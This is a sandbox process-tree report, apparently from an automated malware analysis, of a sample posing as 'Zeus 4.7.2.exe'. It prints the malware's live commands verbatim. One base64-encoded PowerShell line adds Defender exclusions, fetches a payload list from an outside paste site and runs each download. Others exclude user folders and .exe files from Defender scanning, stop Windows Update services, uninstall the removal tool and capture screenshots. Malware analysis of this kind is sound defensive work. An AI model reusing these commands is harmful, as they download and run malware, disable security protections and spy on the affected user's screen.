                                                                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                              6⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:4332
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2y1fxgky\2y1fxgky.cmdline"
                                                                                                                                                7⤵
                                                                                                                                                  PID:3296
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60CD.tmp" "c:\Users\Admin\AppData\Local\Temp\2y1fxgky\CSC5AC61D90E93E417C914DED98B21C622C.TMP"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:4000
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Enumerates system info in registry
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Modifies registry class
                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:3364
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7568ab58,0x7ffb7568ab68,0x7ffb7568ab78
                                                                                                                                            3⤵
                                                                                                                                              PID:2864
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:2
                                                                                                                                              3⤵
                                                                                                                                                PID:3328
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                3⤵
                                                                                                                                                  PID:3772
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2256
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2880 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3640
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3080 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4536
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4320 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3188
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4600
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4628
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4800
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4680 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1544
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4336
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4596 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4628
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4700 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5676
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5908
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5928
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4452 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5980
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3216 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6076
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4980 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5364
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1124
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1956,i,2648730000584848992,4352709062500623048,131072 /prefetch:8
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2944
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_ZeusHex.zip\Zeus 4.7.2.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Temp1_ZeusHex.zip\Zeus 4.7.2.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:5548
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:2992
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:1192
                                                                                                                                                                                    • C:\Users\Admin\HadesHex-GUI.exe
                                                                                                                                                                                      "C:\Users\Admin\HadesHex-GUI.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:5584
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5824
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:5168
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                          PID:4928
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1gb24bst.5350.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1gb24bst.5350.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:6052
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\749.tmp\74A.tmp\74B.bat C:\Users\Admin\AppData\Roaming\1gb24bst.5350.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:3476
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:1000
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1gb24bst.5351.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1gb24bst.5351.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2152
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1gb24bst.5352.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1gb24bst.5352.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:5924
                                                                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              PID:3516
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1000
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:2708
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:3896
                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5488
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:2040
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:5436
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:5504
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:3272
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:5188
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:5540
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:5292
                                                                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:4428
                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:4564
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    7⤵
